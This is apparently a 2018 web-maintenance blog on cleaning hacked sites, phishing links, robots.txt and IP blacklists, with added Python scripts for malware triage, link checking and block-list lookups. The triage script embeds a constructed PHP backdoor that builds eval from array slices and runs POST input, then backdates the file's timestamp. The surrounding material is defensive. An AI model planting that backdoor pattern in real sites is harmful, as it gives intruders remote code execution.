Wednesday, December 12, 2018

Joomla Site Clean Up Tools

Here is a list of “Tools of the Trade” according to Ben Martin at Sucuri Security.

  • FileZilla (FTP Client)
  • NoScript (Script Blocker)
  • VirtualBox (Virtualization Tool)
  • uBlock Origin (Ad Blocker)
  • phpMyAdmin or Adminer (Database Management)
  • User Agent Switcher
  • Support Forums (e.g. https://forum.joomla.org)
  • OSSEC HIDS (Server Monitoring)
  • SSH / Bash connection

I hope this helps someone else out there…


GoDaddy Hosted Website Attacked – PHP Files In Directories

We have a static HTML site built in 2013 that we maintain. We got a notification from GoDaddy that there were malicious files in the website. I started to remove them, but wanted to see what was in them. When I opened one of the files that was three levels into the website, it was extremely complicated. It looks like parts of many arrays, just pulling pieces of multiple arrays. I believe the end goal is to assemble the final script. It looks like this.

Another interesting thing about this attack is the date of the file. It is from 2013. I had made a complete backup of the site on 2/15/2016, but the bad files were dated 2013. None of the bad files were in my 2016 backup.

Nothing was solved. I removed the old files and updated the .htaccess file. I found it interesting how the date could be manipulated.

I hope this helps someone else out there…
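The post above describes two things worth automating: recognising dropped PHP that reassembles itself from array slices, and not trusting file timestamps (an attacker can set any mtime with PHP's touch() or `touch -t`, so a 2013 date on a file that is absent from a 2016 backup proves nothing). The script below is an added example, not code from the post or from GoDaddy. It walks a site tree, flags any PHP file in what should be a static HTML site, scores each on common obfuscation markers, and compares the tree against a known-good backup by content hash. The demo site, the dropped file, its name and the 2013 timestamp are all constructed here for illustration.

```python
"""Triage PHP files dropped into a static HTML site (added example)."""
import hashlib
import os
import re
import tempfile
import time

# Obfuscation markers. A hit is a reason to open the file, not proof of malice.
MARKERS = [
    ("eval()", re.compile(r"\beval\s*\(")),
    ("base64_decode()", re.compile(r"\bbase64_decode\s*\(")),
    ("gzinflate()/gzuncompress()", re.compile(r"\bgz(?:inflate|uncompress)\s*\(")),
    ("str_rot13()", re.compile(r"\bstr_rot13\s*\(")),
    ("chr() chain", re.compile(r"(?:chr\s*\(\s*\d+\s*\)\s*\.\s*){3,}")),
    # Rebuilding names from pieces of arrays, e.g. $a[3].$a[7].$a[1],
    # which is the pattern the post describes.
    ("array-slice concat", re.compile(r"(?:\$\w+\[\d+\]\s*\.\s*){3,}")),
    ("variable function call", re.compile(r"\$\w+\s*\(\s*\$\w+")),
]
PHP_EXT = (".php", ".phtml", ".php5", ".phar")


def score_php(source):
    """Names of the markers found in one PHP source string."""
    reasons = [name for name, rx in MARKERS if rx.search(source)]
    longest = max((len(line) for line in source.splitlines()), default=0)
    if longest > 1000:
        reasons.append("very long line (%d chars)" % longest)
    return reasons


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def index_tree(root):
    """relative path -> sha256 for every regular file under root."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            out[os.path.relpath(full, root).replace(os.sep, "/")] = sha256_file(full)
    return out


def triage(site_root, backup_root=None):
    """Return {relpath: [reasons]} for files that deserve a look.

    A PHP file in a static HTML site is suspicious on its own; anything
    missing from or changed since the backup is flagged regardless of
    what its timestamp claims."""
    site = index_tree(site_root)
    backup = index_tree(backup_root) if backup_root else {}
    findings = {}
    for rel, digest in site.items():
        reasons = []
        if rel.lower().endswith(PHP_EXT):
            reasons.append("php file in static site")
            with open(os.path.join(site_root, rel), encoding="utf-8", errors="replace") as f:
                reasons += score_php(f.read())
        if backup_root:
            if rel not in backup:
                reasons.append("not present in backup")
            elif backup[rel] != digest:
                reasons.append("content differs from backup")
        if reasons:
            findings[rel] = reasons
    return findings


def mtime_year(path):
    """The year the filesystem timestamp claims, which is all a directory listing shows."""
    return time.gmtime(os.path.getmtime(path)).tm_year


# Constructed demo (assumption, not the real dropped file): $f becomes
# "str_rot13" and $g becomes "eval", assembled from array slices.
DROPPED = ('<?php $a=array("s","t","r","_","o","1","3","e","v","a","l");'
           '$f=$a[0].$a[1].$a[2].$a[3].$a[2].$a[4].$a[1].$a[5].$a[6];'
           '$g=$a[7].$a[8].$a[9].$a[10];$g($f($_POST["q"]));')
OLD_STAMP = 1370044800  # 2013-06-01 00:00 UTC, a constructed backdated stamp


def build_demo():
    """Site root with one dropped file three levels deep, and a backup without it."""
    site = tempfile.mkdtemp(prefix="site_")
    backup = tempfile.mkdtemp(prefix="backup_")
    for root in (site, backup):
        with open(os.path.join(root, "index.html"), "w") as f:
            f.write("<html><body>Hello</body></html>\n")
    deep = os.path.join(site, "images", "gallery", "thumbs")
    os.makedirs(deep)
    dropped = os.path.join(deep, "wp-c.php")
    with open(dropped, "w") as f:
        f.write(DROPPED)
    os.utime(dropped, (OLD_STAMP, OLD_STAMP))  # backdate it, as an attacker can
    return site, backup, dropped


if __name__ == "__main__":
    site, backup, dropped = build_demo()
    print("listing says the file is from", mtime_year(dropped))
    for rel, why in triage(site, backup).items():
        print(rel, "->", ", ".join(why))
```

The backdated file still shows 2013 in a listing, but the backup comparison and the obfuscation markers flag it anyway; a real cleanup should also compare against the host's own file-change history, since a backup can itself be taken after the compromise.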


Example of a Phishing Attempt Using An Email From Apple

I often get asked why someone would attack a website. It is often for financial gain. If the attacker can get hold of your credentials, they can impersonate you online: with your bank credentials they have access to your bank, and with your Apple ID credentials they can access your Apple account and buy things.

I got an email from Apple today asking me to log in to my account.

In this image you can see that when I put my cursor over the hyperlink in the email, it is going to “natuursteendoker.be/zooology.php”. I see attacked websites with strangely named PHP files with redirects in them. This can easily redirect a user to a site ready to deliver a malicious payload or virus. It could be a keylogger that phones home with each keystroke, or one that takes screen captures every 5 seconds.

I hope this helps someone else out there….
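Hovering over the link is the manual version of a check that is easy to automate: pull every anchor out of the message body, compare the visible text and the brand the mail claims with the host the link actually points to, and flag the mismatches. The script below is an added example, not code from the post. The message body is constructed to resemble the one described (the href is the one quoted in the post; the surrounding text is invented), and the expected brand domain is an assumption.

```python
"""Flag links whose real target disagrees with what the reader sees (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample in the shape of the message in the post, not the real e-mail.
SAMPLE_HTML = """
<p>Your Apple ID was used to sign in on a new device.</p>
<p>If this was not you, sign in at
<a href="http://natuursteendoker.be/zooology.php">https://appleid.apple.com/</a>
to review your account.</p>
<p><a href="https://support.apple.com/">Apple Support</a></p>
"""
# Assumption: the brand the mail claims to come from owns these domains.
EXPECTED_DOMAINS = {"apple.com"}


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every anchor in the body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def extract_links(html):
    p = _LinkCollector()
    p.feed(html)
    return p.links


def registrable(host):
    """Crude eTLD+1 (last two labels). Production code should use the public suffix list."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def host_in_text(text):
    """Hostname if the visible text itself looks like a URL or bare domain, else ''."""
    host = urlsplit(text if "://" in text else "//" + text).hostname or ""
    return host if "." in host and " " not in host else ""


def check_link(href, text, expected=EXPECTED_DOMAINS):
    """Reasons this link should not be clicked; empty list if it passes."""
    parts = urlsplit(href)
    href_host = parts.hostname or ""
    reasons = []
    if registrable(href_host) not in expected:
        reasons.append("target %r is not a %s domain" % (href_host, "/".join(sorted(expected))))
    shown = host_in_text(text)
    if shown and registrable(shown) != registrable(href_host):
        reasons.append("text shows %r but the link goes to %r" % (shown, href_host))
    if parts.path.lower().endswith(".php"):
        reasons.append("target is a bare PHP script, typical of a redirector on a compromised site")
    return reasons


def audit(html, expected=EXPECTED_DOMAINS):
    """{href: [reasons]} for every link in the body that fails a check."""
    out = {}
    for href, text in extract_links(html):
        reasons = check_link(href, text, expected)
        if reasons:
            out[href] = reasons
    return out


if __name__ == "__main__":
    for href, why in audit(SAMPLE_HTML).items():
        print(href)
        for reason in why:
            print("  -", reason)
```

The support link passes because its host really is under apple.com; the sign-in link fails all three checks. The text-versus-href comparison is the one that catches the trick the post shows, since the visible text is a perfectly good Apple URL.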


Joomla “Forgot your username?” page indexed

To get to a customer’s site I Googled it and discovered the username and password reset pages are being indexed by Google. They show up as some of the top results.

I quickly came across the following article, which led me to work on the robots.txt file and disallow these pages.

https://forum.joomla.org/viewtopic.php?t=903096

For my site I had to add the following:

Disallow: /component/users/

Then go to Google Webmaster Tools and fetch the site. This informs Google that you want your site crawled again.

I hope this helps someone else out there…

Follow up…

I stumbled on this article which further refines the access.

https://moz.com/community/q/robots-txt-how-to-exclude-sub-directories-correctly

His technique:

allow: /directory/$
disallow: /directory/*

Which allows this URL:

http://www.mysite.com/directory/

But doesn’t allow the following one:

http://www.mysite.com/directory/sub-directory2/…
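To see why `allow: /directory/$` together with `disallow: /directory/*` behaves as described, it helps to run the rules rather than read them. The matcher below is an added example, not code from the post or from the linked forum threads. It implements the Google-style semantics: `*` matches any run of characters, a trailing `$` anchors at the end of the path, the longest matching pattern wins, and Allow wins a tie. Python's own urllib.robotparser does not do this (it uses plain prefix matching and takes the first matching rule), which is why it is not used here. The robots.txt text is constructed by combining the two rule sets quoted above.

```python
"""Apply robots.txt Allow/Disallow rules with wildcard and longest-match semantics (added example)."""
import re
from urllib.parse import urlsplit

# Constructed robots.txt combining the two rule sets quoted in the post.
ROBOTS_TXT = """
User-agent: *
Disallow: /component/users/
allow: /directory/$
disallow: /directory/*
"""


def _to_regex(pattern):
    """'*' -> any characters, trailing '$' -> end anchor, everything else literal."""
    anchored = pattern.endswith("$")
    body = pattern[:-1] if anchored else pattern
    regex = "".join(".*" if ch == "*" else re.escape(ch) for ch in body)
    return re.compile("^" + regex + ("$" if anchored else ""))


def parse_rules(text, agent="*"):
    """[(directive, pattern)] from every group whose User-agent is '*' or `agent`.

    Directive names are case-insensitive; only allow/disallow are kept."""
    rules, applies = [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            applies = value.lower() in ("*", agent.lower())
        elif key in ("allow", "disallow") and applies:
            rules.append((key, value))
    return rules


def is_allowed(rules, url):
    """True if the most specific matching rule is an Allow, or nothing matches."""
    parts = urlsplit(url)
    path = (parts.path or "/") + ("?" + parts.query if parts.query else "")
    best = None  # (pattern length, directive) of the most specific match so far
    for directive, pattern in rules:
        if not pattern:  # "Disallow:" with no value blocks nothing
            continue
        if _to_regex(pattern).match(path):
            cand = (len(pattern), directive)
            if best is None or cand[0] > best[0] or (cand[0] == best[0] and directive == "allow"):
                best = cand
    return best is None or best[1] == "allow"


if __name__ == "__main__":
    rules = parse_rules(ROBOTS_TXT)
    for u in ("http://www.mysite.com/directory/",
              "http://www.mysite.com/directory/sub-directory2/page",
              "/component/users/reset",
              "/index.php?option=com_users&view=reset"):
        print("allowed" if is_allowed(rules, u) else "blocked", u)
```

Two caveats the run makes visible. First, the last URL is still allowed: Joomla serves the same reset view at the non-SEF address `index.php?option=com_users&view=reset`, which `Disallow: /component/users/` does not cover, so a second Disallow (or, more reliably, a `noindex` robots meta tag or `X-Robots-Tag` header on those views) is needed to keep them out of the index. Second, robots.txt is only a request honoured by well-behaved crawlers and is itself public, so it hides nothing from a person looking for the reset pages.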

IP blocked by M&T Bank / mtb.com – how to unblock

We recently installed a Barracuda firewall and accidentally left “Proxy” on. This caused our IP to be used as a spam relay, which got our IP put on a blacklist. A traceroute from our server to mtb.com showed the packets getting to mtb.com and stopping. We assumed it was mtb.com blocking the IP.

MTB said they get their blacklist from outside sources. They directed me to the following site, where I was able to submit a request to get the IP off of the blacklist.

http://www.brightcloud.com/tools/url-ip-lookup.php

I could see that the IP was showing as suspect. I clicked on “IP Reputation” and submitted the IP for review. Since I knew the proxy issue was resolved, the IP should have been cleared. This didn’t resolve the issue.

I discovered Barracuda has its own IP lookup. This showed our IP as not having a “poor” reputation.

http://www.barracudacentral.org/lookups/lookup-reputation

More searching brought me to this page.

https://www.whatismyip.com/blacklist-check/?iref=ip-lookup

There were two sites that had our IP listed. When I tried to go to mailhosts.org I got an error saying that domain is available. Blacklisted, with no way to get it removed.

Looking into alternative fixes.

I hope this helps someone else out there…
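The web lookup pages used above front the same mechanism most mail servers use to decide whether to accept a connection: a DNS-based block list (DNSBL). The octets of the IP are reversed, the list's zone is appended, and the name is resolved; an A record in 127.0.0.0/8 means "listed" and NXDOMAIN means "not listed". The script below is an added example, not code from the post or from Barracuda, and queries the public Barracuda and Spamhaus zones directly so the check can be scripted rather than done by hand.

```python
"""Check an IPv4 address against DNS-based block lists (added example)."""
import ipaddress
import socket

# Public zones behind the lookup pages in the post (Barracuda) and one of
# the lists most mail servers consult (Spamhaus ZEN).
DNSBL_ZONES = ("b.barracudacentral.org", "zen.spamhaus.org")


def dnsbl_name(ip, zone):
    """Query name for `ip` in `zone`, e.g. 192.0.2.1 -> 1.2.0.192.<zone>."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("this example handles IPv4 only")
    return ".".join(reversed(str(addr).split("."))) + "." + zone


def interpret(answer):
    """Turn a DNSBL A answer (or None for NXDOMAIN) into a verdict.

    Spamhaus answers 127.255.255.x instead of a listing when it refuses
    the query (for example when it arrives via a public resolver that has
    exhausted its quota), so those must not be read as "listed"."""
    if answer is None:
        return "not listed"
    a = ipaddress.ip_address(answer)
    if a in ipaddress.ip_network("127.255.255.0/24"):
        return "query refused: %s" % answer
    if a in ipaddress.ip_network("127.0.0.0/8"):
        return "listed (code %s)" % answer
    return "unexpected answer %s" % answer


def check_ip(ip, zones=DNSBL_ZONES):
    """{zone: verdict} for `ip`. Needs working DNS.

    127.0.0.2 is the conventional test entry that block lists return as
    listed, so it is a handy way to confirm the resolver path works."""
    verdicts = {}
    for zone in zones:
        try:
            answer = socket.gethostbyname(dnsbl_name(ip, zone))
        except socket.gaierror:  # NXDOMAIN (or resolver failure): treat as not listed
            answer = None
        verdicts[zone] = interpret(answer)
    return verdicts


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.2"
    for zone, verdict in check_ip(target).items():
        print("%-26s %s" % (zone, verdict))
```

Run it against the mail server's public IP from a resolver you control; the listing code in the answer tells you which sub-list (and therefore which delisting form) applies. Because a receiving site such as a bank may consult lists that have no delisting process at all, the durable fix is the one the post is working toward: stop the relaying, then wait for the listing to age out.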


“The site ahead contains malware” security error – how to fix

A client’s site got the following message when users went to the site.

My journey started with the host, which was the wrong place to start. It was all Google this time. Here are the steps to get Google to review your site and take it off the blacklist.

  1. Go to https://support.google.com/chrome/answer/99020?hl=en
  2. Go down to “My site…” and click on “request a review”.
  3. On this page is a video to walk you through the process.
  4. Next I logged into Google Webmaster Tools, clicked on Messages, clicked on the property with the malware message, and hit “Request a review”.
  5. Lastly click “I have fixed these issues.”
  6. A window will open for you to tell Google what you did to clean the site.
  7. You will get the message “Your request was submitted successfully. Please check back later.”

I hope this helps someone else out there…


Google Chrome redirect – http://www.google.com/ig/redirectdomain?brand=TSND&bmod=TSND

Had a customer call in because he was on the LA Times website and clicked on a link that caused his browser to pop up a Microsoft warning. The warning said he was infected and needed to pay. He hit Control-Alt-Delete and closed Chrome. He restarted his machine and called us.

I opened Chrome and looked at the start page. It was set to “http://www.google.com/ig/redirectdomain?brand=TSND&bmod=TSND”. When I put that URL into another browser it took me to just Google. I figured the rest was unnecessary and reset his home page to just be “http://www.google.com”.

I downloaded a rootkit scan tool from Bleeping Computer and ran a quick scan. We also use VIPRE Antivirus. I updated the definitions and ran a full deep scan with VIPRE. Nothing else was wrong.

I hope this helps someone else out there…